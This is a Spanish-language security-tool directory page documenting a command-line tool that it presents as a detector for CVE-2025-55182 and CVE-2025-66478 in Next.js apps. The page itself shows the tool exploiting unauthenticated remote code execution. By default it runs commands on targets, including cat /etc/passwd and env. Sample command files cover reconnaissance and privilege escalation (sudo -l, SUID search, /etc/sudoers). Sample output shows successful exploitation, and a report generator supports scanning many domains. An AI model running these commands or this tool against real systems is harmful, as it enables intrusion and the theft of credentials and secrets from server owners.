Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Una herramienta de línea de comandos para detectar CVE-2025-55182 y CVE-2025-66478 en aplicaciones Next.js que utilizan React Server Components. | Kitploit
Herramientas/GitHubGitHub/rix4uni/cve-2025-55182
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y Control
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

Una herramienta de línea de comandos para detectar CVE-2025-55182 y CVE-2025-66478 en aplicaciones Next.js que utilizan React Server Components.

Ver Repositorio
61hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182

Una herramienta de línea de comandos para detectar CVE-2025-55182 y CVE-2025-66478 en aplicaciones Next.js que utilizan React Server Components.

🚀 Instalación

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ Uso

Escáner CVE-2025-55182

Sintaxis básica

root@kitploit:~
CVE-2025-55182 -d https://example.com

Opciones

Nota: Si no se proporcionan opciones de comando, se ejecutan los comandos predeterminados.

Comandos predeterminados

La herramienta ejecuta estos comandos por defecto:

  1. cat /etc/os-release - Información del SO
  2. whoami - Usuario actual
  3. pwd - Directorio de trabajo actual
  4. id - ID de usuario y grupos
  5. uname -a - Información del sistema
  6. hostname -I - Interfaces de red
  7. ls -la - Listado de directorios
  8. cat /etc/passwd - Cuentas de usuario
  9. env - Variables de entorno
  10. ps aux - Procesos en ejecución

Generador de informes

La herramienta reportgenerator genera automáticamente informes profesionales de divulgación de vulnerabilidades a partir de los resultados del escaneo.

Características

  • Escaneo paralelo de múltiples objetivos
  • Numeración automática que preserva los informes existentes (sin sobrescribir)
  • Informes profesionales en markdown con sección de Divulgación de Vulnerabilidad de Seguridad
  • Nombre de investigador personalizable y archivo de entrada

Uso básico

root@kitploit:~
# Crea un archivo con los dominios objetivo
echo -e "https://target1.com\nhttps://target2.com" > subs.txt

# Ejecuta el generador de informes
reportgenerator

Opciones

ParámetroDescripciónPredeterminado
--fileArchivo de entrada que contiene los dominios objetivosubs.txt
--userNombre del investigador para la sección de divulgaciónBhagirath Saxena

Ejemplos

root@kitploit:~
# Usar configuración predeterminada (subs.txt, Bhagirath Saxena)
reportgenerator

# Usar archivo de destino personalizado
reportgenerator --file targets.txt

# Usar nombre de investigador personalizado
reportgenerator --user "John Doe"

# Usar ambas opciones personalizadas
reportgenerator --file my-targets.txt --user "Jane Smith"

Estructura de salida

Los informes se generan en dos directorios:

  • textfile/ - Salida de escaneo sin procesar (numerados: 1.txt, 2.txt, etc.)
  • mdfile/ - Informes profesionales en markdown (numerados: 1.md, 2.md, etc.)

Nota: La función de numeración automática garantiza que los informes existentes nunca se sobrescriban. Los nuevos escaneos continúan desde el número más alto existente.

Formato del informe

Cada informe generado incluye:

  1. Divulgación de vulnerabilidad de seguridad - Carta de presentación profesional
  2. Objetivo - El dominio probado
  3. Comandos ejecutados - Lista de comandos ejecutados durante la prueba
  4. Resumen de vulnerabilidad - Detalles de CVE y evaluación de impacto
  5. Detalles de explotación - Salidas de comandos con estado de ejecución
  6. Resumen de ejecución - Tabla que muestra éxito/fallo de cada comando
  7. Análisis de impacto - Evaluación de gravedad y observaciones
  8. Recomendaciones - Pasos de remediación para el equipo de seguridad
  9. Referencias - Enlaces a detalles de CVE y avisos de seguridad

🎨 Ejemplos de salida

Explotación exitosa

root@kitploit:~
▼ 🎯 OBJETIVO: https://vulnerable-app.com
▼ 📋 COMANDOS A EJECUTAR: 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Ejecutando: cat /etc/os-release
▼ 💻 INFORMACIÓN DEL SO
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Ejecutando: whoami
▼ 👤 USUARIO ACTUAL
║ www-data
...

[3/10] Ejecutando: pwd
▼ 📂 DIRECTORIO ACTUAL
║ /var/www/html
...

Éxito parcial

root@kitploit:~
[6/10] Ejecutando: hostname -I
╔════════════════════════════════════════════════════════════╗
║ Comando falló: hostname -I
║ Este comando podría no estar disponible o el servidor lo rechazó
╚════════════════════════════════════════════════════════════╝

[!] Intentando comando de red alternativo...
▼ 🌐 INTERFACES DE RED (alternativo)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 Detalles técnicos

Vulnerabilidad

  • CVE: CVE-2025-55182
  • Tipo: Contaminación de prototipos → RCE
  • Afecta: Aplicaciones Next.js con configuraciones específicas
  • Vector: HTTP POST con datos multipart/form-data manipulados
  • Impacto: Ejecución remota de código sin autenticación como usuario de la aplicación

📚 Referencias

  • Detalles de CVE-2025-55182
  • Avisos de seguridad de Next.js

Ejemplos del directorio commands/:

Crea archivos de comandos de ejemplo para diferentes escenarios:

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
Descargar herramienta
OpciónDescripciónPredeterminado
-d, --domainURL objetivo (agrega https:// automáticamente si no tiene protocolo)http://localhost:3000
-c, --commandComando único a ejecutar-
-m, --multipleComandos múltiples separados por punto y coma-
-f, --fileArchivo que contiene comandos (uno por línea)-
-h, --helpMostrar mensaje de ayuda-